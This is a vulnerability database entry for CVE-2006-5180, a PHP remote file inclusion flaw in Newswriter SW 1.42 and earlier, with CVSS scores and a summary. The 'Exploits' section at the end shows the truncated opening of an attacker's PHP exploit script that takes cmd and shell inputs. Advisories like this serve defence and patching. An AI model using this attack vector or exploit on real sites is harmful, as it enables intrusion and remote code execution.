7.5
CVSSv2

CVE-2006-5180

Published: 10/10/2006 Updated: 17/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in include/main.inc.php in Sebastian Baumann and Philipp Wolfer Newswriter SW 1.42 and previous versions allows remote malicious users to execute arbitrary PHP code via a URL in the NWCONF_SYSTEM[server_path] parameter, a different vector than CVE-2006-5102.

Vulnerable Product Search on Vulmon Subscribe to Product

baumedia newswriter 1.41

baumedia newswriter

baumedia newswriter 1.40

Exploits

<?php /* XORON - TURKISH HACKER Thanx: str0ke, Ironfist, Preddy, */ $cmd = $_POST["cmd"]; $glowna = $_POST["glowna"]; $shell = $_POST["shell"]; $exp= "<title>Newswriter SW v142 Remote File Include Exploit :: XORON :: TURKISH HACKER ::</title>" "<style type=\"text/css\">" "body {background-color: #006600;}" "body,td,th ...